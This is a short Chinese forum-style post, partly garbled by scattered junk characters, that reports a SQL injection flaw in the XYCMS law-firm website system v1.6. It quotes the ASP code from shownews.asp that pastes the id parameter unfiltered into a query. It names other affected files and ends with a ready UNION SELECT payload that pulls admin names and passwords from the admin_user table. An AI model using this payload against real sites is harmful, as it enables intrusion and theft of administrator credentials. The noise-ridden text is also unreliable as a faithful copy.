前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似0 R. }' Y- b5 V+ j5 o
% E* v2 |% C" s/ B
淫荡分割线
" G' n' {( o( B0 G s q+ q8 `--------------------------------------------------------
6 p' [8 F) E" O; `, s4 K8 x* X
" R' Z9 ~" \/ V- Y3 j% d审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)6 L8 B1 F, y1 ]- g E( h2 y2 B
源码地址:http://down.chinaz.com/soft/29233.htm
: m u( l3 c1 f8 t4 k
' E& y! m" d5 z& a漏洞文件:shownews.asp
& W: _6 i9 k$ y漏洞代码:7-13行
; a% `* p% H# b4 f * m: O' d9 I9 }
9 L5 j3 o5 A7 f
<%
7 O4 X; g7 J3 B* I; T; v3 Gid=request.QueryString("id"). n6 Q# u! |, K5 Z4 I
' U6 v$ t: r5 i( s# J% Vset snews=server.createobject("adodb.recordset")
" I. l n& c4 y3 M) vexec="select * from [news] where id="&id
C# A* Y* j# A5 ?3 t* M3 T7 B, i4 l. Rsnews.open exec,conn,1,1 g( {; T" u; ]1 E$ T
%>
$ P+ J! |9 W3 _% J- O# e) G" z
* P; e0 |: C" q
$ I+ c: U9 V# s什么过滤都没有 直造成注入( Z( b2 F2 U/ @$ r: J4 c0 ~: h
1 n# a# [' g5 X, i, p9 N0 q) N) h3 l注入点:http://127.0.0.1:99/shownews.asp?id=xx# j1 ~* l6 E: e! Z' z
$ M& | @, ]( }1 P/ y$ G/ [
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找0 u8 n9 q" Q7 ~" t; R- B r, ^$ {6 t
( `: j5 `" Z; ~4 Z+ c1 s
9 \# V9 d# ]- h, y5 e! y
exp: union select 1,admin,password,4,5,7 from admin_user5 p/ J% R( W5 A3 C9 z
9 G- i2 [' T) P" w' b- W
|